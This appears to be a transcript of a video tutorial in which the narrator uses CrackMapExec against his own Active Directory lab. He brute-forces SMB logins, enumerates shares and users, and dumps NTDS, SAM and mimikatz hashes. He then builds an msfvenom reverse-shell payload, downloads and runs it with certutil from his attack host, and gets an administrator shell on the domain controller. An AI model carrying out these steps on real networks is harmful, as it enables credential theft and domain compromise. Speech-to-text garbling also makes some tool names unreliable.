Hey guys, it's me ActiveXSploit back again with a new video, and in today's video we are going to have a look at a wonderful tool named CrackMapExec. So CrackMapExec is a very good tool, as I said, and if you are familiar with the Windows exploitation stuff such as Active Directory and exploiting Windows boxes, you might know this tool as it is used for brute forcing various services such as SMB, LDAP, WinRM, etc. Alright. Now, the best part about the tool is that it does a lot more than just brute forcing. You can do various things with it, such as you can get a shell using Metasploit or PowerShell Empire if the target user is actually a domain admin. You can dump hashes using mimikatz, you can dump the system hive, the SAM hive, etc. And you can also enumerate SMB shares, you can enumerate users, groups, etc. Alright, so with that being said, let's get started. Alright, so let's first of all get started off by the installation process. So if you are using Kali Linux as your default hacking distro, CrackMapExec should be installed by default, right? But let's say if you're using a different distro, and in order to install a tool, all you can do is you can just run apt-get install CrackMapExec, right? And once you press enter, it will start the installation, and in my case, as you can see, it says CrackMapExec is already the newest version. Now if you don't want to use the apt package manager in order to install the tool, you can actually clone it from GitHub and install it. So if I just search for CrackMapExec GitHub, you will see that we have the GitHub repository in here. So I'll just open it up, and as you can see, it also has the installation guide. So in order to install it, you can just simply visit the wiki page and simply install it after reading the documentation. All right. Now, I actually suggest that you should install it using the apt package manager, or else you can simply go with the GitHub repository. All right. So now let's actually get started off by using the tool. So in order to use CrackMapExec, first of all you will actually have to type CrackMapExec, and once you press enter, as you can see, you get a nice help menu, right? Now the syntax is actually something like this. So first of all, you have to specify the protocol which you want to target. Alright, so we are going to be using SMB in this video. We are not going to be focusing on WinRM or LDAP or SSH. You can have a look at them on your own. Alright, so and then we have the optional arguments such as the threads which we want to specify. If you want to make CrackMapExec go faster, you can increase the thread amount, increase the thread number. Alright, and then if you want the output to be verbose, you can simply set the verbose flag. Alright, so now the basic syntax of CrackMapExec is, let's say if you want to use the SMB module, we are simply going to be saying SMB, alright, and then you specify the IP address on which you want to perform it. So in my case, I have my own Active Directory lab. Okay, I have 2 client machines and 1 domain controller, and the domain controller which I am using is Windows Server 2016. Okay, now after specifying the protocol which we want to use, we simply specify the IP address, which is going to be 192.168.1.57. okay, and this IP address is actually the a client IP address. Okay, it's not a domain controller IP address. Now let's say if I want to get help with the SMB module, I'll simply say SMB CrackMapExec SMB -h. Alright, and it should print out additional help menu for the SMB module. Alright, so let's actually have a look at this. So first of all, in order to brute force a particular user, you have to specify the -u flag, right? So you can actually specify a single username, or else you can go with a file which contains usernames. Okay, and then you have to specify the password or the file which contains passwords, right? For that you have to specify the -p flag, and then we have a lot of arguments which we can pass with the tool, but we are not going to be looking at them for now. Alright, so first of all, let's actually get started off by some basic brute forcing. So what I'll be doing is I'll be opening up, I'll be creating a text file called usernames, alright, and I'll start out by typing some fake usernames. Let's say I can type out test user, fake user. I can also type, let's say, the original username, which is Vedant and Elliot. I can type one more fake user, which can be F Society, alright, and I can create one more file called password, actually passwords, and I can include some of the passwords in here. So I'll start off by a fake password, let's say 123456778. We can include, let's say, password, and I'll include the original password. We can also include, let's say, test password, fake password, Elliot Alderson, and we can include one more password if we want. Let's say it can be a random fake password, right? I'll be simply saving this file, and now let's actually brute force SMB. Alright, so I'll be saying CrackMapExec SMB, the IP address, which is going to be 192.168.1.57, and then we specify the username using the -u flag, and the username which we are targeting is Elliot, and then we specify, no, whoops, not Elliot, we are actually going to be specifying the username file, which is usernames, and then we specify the password file, which is passwords, and we simply press enter, right? And as you can see, it starts the brute forcing process. And now over here you'll notice that it prints out pund. Now it's going to print out pund only when the user which you are targeting is actually domain admin. Alright, so now in my case, the user Vedant is actually a domain admin, and the password which was found for this user is a valid password. Hence, the tool is considering it pund. Alright, so now we can use psexec, or we can use wmiexec or SMBexec in order to get shell on this machine, right, as this user. Now you notice that the brute force attack actually got stopped. Okay, it got stuck after it found one valid user. So in order to continue the brute forcing process, even if we find a valid user, you have to specify the -- continue on success flag. Alright, so the brute forcing attack is going to continue even when we find one valid user. And as you can see, we have two valid usernames and and their corresponding passwords in here. So we have the Vedant username and the Elliot username. Alright, now what if the user which we just found the password for is actually not a domain admin and just a normal domain user? In that case, CrackMapExec is not going to print this pund statement over here, right? We can check it if we want. So if I'm going to be editing the usernames file, and I'll just add dialin over here, right? And now I'll just say CrackMapExec. I'll be using the same command line which we used previously, and I'll just press enter. Whoops, yeah, I'll actually have to edit the passwords file too, and I'll be adding the password in here, which is hacker@1337x for the Darlin user, and we'll just start the brute forcing attack. And as you can see, the user Darlene is actually not a domain admin, and that is why it didn't print the pund statement in over here, which it did for the domain administrator user, which is Elliot and Vedant. Alright, so now we have three valid usernames and their corresponding passwords, and two of them are domain admins and one is a normal domain user. So let's actually have a look at what more can we do with the tool instead of simply spraying usernames and passwords. So let's actually try to enumerate SMB shares. So once again, if I do CrackMapExec, whoops, SMB-H, and if we go a bit up, whoops, sorry for that. As you can see in the mapping and enumeration section, you have one flag in order to enumerate shares, alright? So in order to enumerate SMB shares, all you have to do is specify the -- shares flag. So let's actually quit out of this and perform some SMB enumeration for the user which we just found. I'll just get the IP address 57.192.168.1.57, and instead of specifying a whole username file, I'll be simply specifying a user in here which will be Elliot, and the password for that user. Oops, I forgot to specify the -- shares flag. And as you can see, CrackMapExec actually brings you the SME share information for this user, right? Now, as you can see, we have read and write permissions to the admin $share. That is because this user is actually a domain administrator, right? So now in order to gain access to this particular machine, we can use psexec or wmiexec, as I said previously, but we don't want to do that for now, right? So let's actually have a look at some more modules in CrackMapExec. So if I once more print out the help menu, we can also enumerate the active sessions using the -- sessions flag. We can also enumerate the disks on the computer using the -- disks flag, and we can also enumerate the users. So let's actually try enumerating all three of them, right? So I can just say -- users this time, or let's say I'll go for disks this time, okay? And as you can see, it prints out all the disks which are on the system, right? This is not valuable information for us, all right, for now. And let's actually have a look at the users flag now, which is going to get us all usernames. Whoops, okay, wait, we have to specify the domain controller IP address this time. And as you can see, we can enumerate all the domain users, and we basically found all the users on the domain, alright? So we have administrator, guest, the KRB TGT account. We have discovered one more username, which is Darlene, Elliot, printer service, etc. Alright, so now we can also check the -- sessions flag, which basically enumerates if there are any sorts of active logon sessions going on. So there is no active logon session currently. That is why it did not print any of them. Alright, now let's actually have a look at other modules. So what else can we do using CrackMapExec? Alright, one more important and useful module, useful argument which we can use is the password policy argument, which basically prints out the password policy, right? So this time let's actually target the Darlene user, right? A non-domain user, 1337x, and the -- pass pol argument, and I'll finally change the username, which is Darlene, right? And as you can see, it gets us the password policy for this particular user, right? So as you can see, we have password complexity flags in here. The domain diffuse password change is set to 0. The domain password complex is set to 1. We have the minimum password age, which is 1 day and 4 minutes. We have the reset account lockout counter, which is 30 minutes, locked account duration to 30 minutes, etc. Alright, now let's actually get offensive and dump some hashes from the target system, as we already have two domain admin accounts with us. Alright, so now if you have a look at the CrackMapExec help menu, and if you scroll up, you will see one section called credential gathering, right? And in that section we have three arguments. So first one is a dash dash SAM argument, which can be used in order to dump SAM hashes from the target system. And then we have the dash dash LSA argument, which can be used for dumping LSA secrets from the target system. And finally we have the dash dash NTDS one, which can be used for dumping the NTDS.dit file from the target domain controller using the specified method, and the default method is DRSU API1, right? The VSS one is the shadow copy one, right? Now let's actually try dumping the NTDS.dit file from the domain controller. So the command line should be CrackMapExec SMB, then we specify the IP address of the domain controller, then the username, and then the password, and then you specify the dash dash NTDS flag. Now let's say if you don't want to dump the NTDS.dit file, but if you want to dump the SAM hashes, you can simply specify the dash SAM like this, alright? Or else if you want to go for LSA secrets, you can simply specify the dash dash LSA flag. So let's specify the dash dash NTDS flag and let this run through. And there we go. As you can see, we have hashes of all the users on the domain, right? So as you can see, we have the hash for the Vedant user, we have hash for the Darling user, we have hash for the administrator user, and we also have hash for the printer service user, right? And now let's actually try enumerating all the groups on the target domain controller, alright? So once again, if I have a look at the CrackMapExec help menu for the SME protocol, and if you scroll up, you will see that you should have one module called yep, there we go, the groups one, right? The groups argument, which basically enumerates the domain groups, right? Now if you specify a particular domain group specifically, all right, CrackMapExec won't enumerate the other ones, okay? It's only going to show information about the group which is specified, all right? The same goes for the users and the local groups argument, right? Now let's actually run the tool, and let's say I specify the IP address, the username, let's specify the Elliot username this time, and then let's specify the dash dash groups flag, right, which basically is going to list out all the groups which are currently active on the domain controller. As you can see, we have the administrators group, which is by default there on any Windows machine or a domain controller, and then we have the users group, the print operators, backup operators, we have Hyper-V administrators, and so on, right? Now let's actually have a look at how can we use modules in CrackMapExec. So in order to list out all the modules which we can use with CrackMapExec, you can simply specify the dash L flag in order to list out all the modules with CrackMapExec, alright? So as you can see, we have a lot of modules. We have PE inject module, we have tokens module, we have the mimikatz module, the interpreter inject module, we have enum AV products module, and so on, right? Now let's actually have a look at the mimikatz module. So let's say if I want to print out any sorts of options which we can use with any of the module listed in here, all we have to do is to simply specify the dash dash options flag with the module which we want to use. Alright, so we simply have to say CrackMapExec SMB dash L, whoops, not dash L, we specify dash M, and then you specify the option, you specify the module name, and then you simply specify the dash dash options flag, right? And it's going to print out all the module options for mimikatz, right? And as you can see, for mimikatz, we have to set the command which we want to execute. All right, the default one is securlsa logon passwords, which basically gets all stored logon passwords on the machine. So let's actually stick with the default one. So if we want to use it, we can simply say CrackMapExec SMB dash no, we specify the domain controller IP address, which is 192.168.1.58, and then you specify the username and then the password for that user, and then you simply specify the dash M flag, the uppercase M. Alright, please note that the M over here is actually uppercase and not lowercase. Alright, and after specifying the dash M flag, you specify the module which you want to use, which is mimikatz in our case. Alright, as you can see, it downloads the invoke mimikatz.powershell script to the target machine, and there we go. As you can see, we have the stored credentials on the domain controller, and it basically prints out NTLM hash for the administrator user. Now let's say if I want to specify my own command. Alright, for that all you have to do is simply say dash O. You have to specify the dash O flag, and you say command, right? And then you specify the mimikatz command which you want to use. So let's say if you want to use privilege debug in order to check our privileges, and as you can see, it prints out the output and it says privilege 20 OK, which means we are indeed an administrator. Alright, so let's actually have a look at the last functionality for today's video in CrackMapExec, which is basically how you can execute commands on target system. Alright, so if you have once again look at the help menu of CrackMapExec, you'll see that we have one section called command execution, and in that, as you can see, we can execute command using the dash lowercase x flag, which basically executes the specified command. Now if you want to execute a PowerShell based command, you have to specify the dash uppercase x flag, right? So now what I was actually thinking is that instead of executing a normal command, let's actually get a reverse shell over the target machine. Alright, so what we are going to do is we are simply going to first of all generate a payload using Metasploit. So I'll split my pane and I'll be generating a payload using Metasploit. Let's say msf venom -p windows. I'll actually, yep, there we go. msf venom -p windows x64 interpreter reverse TCP. The L host is going to be my Kali Linux IP address. The L port is going to be let's say 8082, and finally we specify the format, which is going to be executable, and the output file, which can be, let's say, interpreter shell.exe underscore shell.exe. Right, now this is going to generate the payload first, and there we go. Now what I'm going to do is I'll be actually starting an HTTP server on port 8088, right? And now what I'll be doing is I'll be forming a command. Let's say CrackMapExec SMB 192.168.1.58 -u administrator -p. We specify the password, and then we specify the -x flag in order to execute any command. Right, now we are going to use certutil in order to download the interpreter payload from our Kali Linux machine. Alright, so we can say cert util dash URL cache dash f, and then we simply put the URL of the Kali Linux machine, which is 192.168.1.2, and the port which we had set up, which is port 8088. Alright, so the port is 8088, and then we simply specify the name which we use. We basically specify the payload name, which is interpreter underscore. Yep, it has a typo in there. Interpreter underscore shell.exe, and then we save this file on disk, interpreter underscore shell.exe, and then we execute it. So we're going to be saying cmd /c interpreter underscore shell.exe. Alright, now let's actually start Metasploit, and let's listen for incoming connections before executing the payload. I'll be saying use exploit multi handler, and then I'll be setting the payload to Windows x64 interpreter was TCP, and then we finally set the listening host, which is my Kali Linux IP address, and the port, which was, I guess, it was 8081, I guess. Whoops, I actually forgot the port. Yep, it was 8082, right? So I'll be setting the listening port to 8082, and then finally I'll be listening for incoming connections. Now let's execute the command, and let's hope that this is going to work. So I'll simply press enter, and there we go. As you can see, we have a interpreter session. So I'll just move this window, and there we go. Now I can execute commands. As you can see, once I do get UID, we are administrator on the domain controller. I can run get privs in order to get the privileges which the administrator user is having. As you can see, we have all the privileges. Of course, the administrator user on a domain controller has all privileges.